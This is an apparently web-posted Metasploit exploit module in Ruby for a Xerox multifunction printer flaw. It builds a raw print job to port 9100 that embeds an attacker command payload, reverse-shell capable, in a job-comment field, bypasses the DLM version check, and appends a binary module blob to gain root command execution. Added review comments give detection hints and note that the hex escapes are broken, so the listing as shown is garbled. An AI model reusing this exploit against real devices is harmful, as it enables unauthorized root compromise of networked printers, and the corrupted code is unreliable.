
Xerox Multifunction Printers (MFP) "Patch" DLM Escalation

Posted on 01 November 2014

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# NOTE(review): this listing is a web rendering in which every line break was
# collapsed and the hex escapes inside the string literals below appear to have
# lost their backslashes during extraction ("x0A" rather than an escape
# sequence). As shown here the Ruby is therefore not a verbatim copy of the
# upstream module; treat it as a reference listing, not as runnable code.
#
# What the listing documents, for defenders: a single raw print job sent to
# TCP/9100 whose Xerox job header declares a Dynamic Loadable Module job type,
# sets the DLM version attribute to the literal NO_DLM_VERSION_CHECK, and
# carries an attacker-chosen command inside a job-comment attribute. The
# vendor advisory referenced below (XRX12-003) is the mitigation reference;
# exposure of the raw print port to untrusted networks is the precondition.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata. Notable fields: 'Privileged' => true and the description
  # both state the commands run as root; 'Space' => 512 bounds the encoded
  # payload that is inlined into the job-comment attribute in #exploit; the
  # only registered option is RPORT, defaulting to 9100 (raw print port).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
      'Description'    => %{ This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary commands under root priviages. },
      'Author'         => [
        'Deral "Percentx" Heiland',
        'Pete "Bokojan" Arzamendi'
      ],
      'References'     => [
        ['BID', '52483'],
        # Vendor security bulletin XRX12-003 (mitigation reference).
        ['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
        ['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
      ],
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Payload'        => {
        'DisableNops' => true,
        'Space'       => 512,
        'Compat'      => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic bash-tcp'
        }
      },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic', {}]],
      'DisclosureDate' => 'Mar 07 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(9100)
      ], self.class)
  end

  # Builds one print job as a string and writes it to the socket in a single
  # put, then hands off to the payload handler.
  #
  # Structure of the job as written below (each attribute is one line,
  # delimited by the "%%XRXbegin" / "%%XRXend" markers):
  #   - OID_ATT_JOB_TYPE        = OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE
  #   - OID_ATT_JOB_SCHEDULING  = OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE
  #   - OID_ATT_JOB_COMMENT     = "PraedaPWN2014:<payload.encoded>:"  (the
  #                               command is carried in this comment field)
  #   - OID_ATT_JOB_COMMENT     = "patch"
  #   - OID_ATT_DLM_NAME / OID_ATT_DLM_VERSION ("NO_DLM_VERSION_CHECK") /
  #     OID_ATT_DLM_SIGNATURE (a fixed hex value) /
  #     OID_ATT_DLM_EXTRACTION_CRITERIA ("extract /tmp/xerox.dnld")
  #   - a trailing opaque byte blob after %%XRXend; its leading bytes
  #     (1F 8B 08) look like a gzip header — TODO confirm, not decoded here.
  #
  # Detection hint grounded in these literals: a job on TCP/9100 containing
  # the DLM job type together with the NO_DLM_VERSION_CHECK version string is
  # the signature of this technique.
  #
  # Errors: connection-level failures (timeouts, refused/unreachable host,
  # address in use) are rescued and reported via print_error rather than
  # propagated; disconnect always runs via ensure.
  def exploit
    print_status("#{rhost}:#{rport} - Sending print job...")

    # Job header. NOTE(review): "x0A" etc. are shown here exactly as the page
    # renders them (escape backslashes missing) — see the file-level note.
    firmcode = '%%XRXbegin' + "x0A"
    firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "x0A"
    firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "x0A"
    # The encoded payload is embedded verbatim inside the job-comment value.
    firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "x0A"
    firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "x0A"
    firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "x0A"
    # Version attribute is set to a literal that names a check bypass; the
    # device-side semantics are not visible from this listing.
    firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "x0A"
    firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "x0A"
    firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "x0A"
    # End marker followed immediately by the opaque DLM byte blob.
    firmcode << '%%XRXend' + "x0Ax1Fx8Bx08x00xB1x8Bx49x54x00x03xED"
    firmcode << "xD3x41x4BxC3x30x14x07xF0x9ExFBx29xFExE2x60x20x74"
    firmcode << "x69x63x37x61x5AxBCx79x94xDDx3CxC8xA0x59x9BxDAx4A"
    firmcode << "xD7xCCxB4xD3x1DxF6xE1x8DxDDx64xB8x83x3Bx0Dx11xFE"
    firmcode << "xBFx43x03xAFx2FxEFxBDxB4x64xA3xADxD9x8CxDAxD2x3B"
    firmcode << "xA3xD0xB9x19x8FxFBxD5x39x5ExC3x58x4ExBCx48xC6x52"
    firmcode << "x5Ex87xE3x89x8CxBDx30x8AxE4x44x7Ax08xCFx39xD4xB7"
    firmcode << "x75xDBx29x0Bx78xD6x98xEExB7xBCx53xEFxFFxA9xCBx0B"
    firmcode << "xB1xA8x1AxB1x50x6DxE9x17x55x9DxA4x2Fx56xAFx10xD4"
    firmcode << "x08x1Ex30x9Cx59xA5x73x35x7Bx7Ax94x61x14x0Fx21xDE"
    firmcode << "x95x15xEDxCAx98x5Ax34x99x68x74x27x5ExCDx62x7Ax35"
    firmcode << "x8Ax52xBFx2AxF0x8CxA0xC0xC0xD5xC0xDCxEFx4AxDDxF8"
    firmcode << "xC0x47x59xD5x1Ax56xABx1Cx75xD5x68x17xC9x8Dx7Bx00"
    firmcode << "x3Ax2Bx0Dx06x5Fx31x6CxB1xEBxF8x06xFCx68xD7xE7xF5"
    firmcode << "x65x07xF7x48x12x84x98xDFx62x5Fx17xC8xCCx72xA9x9A"
    firmcode << "x3Cx49x0Fx95xB6xD9xBAx43x90x4FxDDx18x32xEDx93x8A"
    firmcode << "xAAxEFxE8x9AxDCxF5x83xF9xBBxE4xFDxDExEDxE1xE0x76"
    firmcode << "x89x91xD8xECx6Fx82xFBx0CxFEx5FxFFx15x22x22x22x22"
    firmcode << "x22x22x22x22x22x22x22x22x22x22x22x22x22xA2xD3x3E"
    firmcode << "x01x5Ax18x54xBBx00x28x00x00"

    begin
      connect
      # Whole job is written in one call; no response is read before handing
      # off to the payload handler.
      sock.put(firmcode)
      handler
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
      # Transport failures are reported, not raised.
      print_error("#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end
end

 
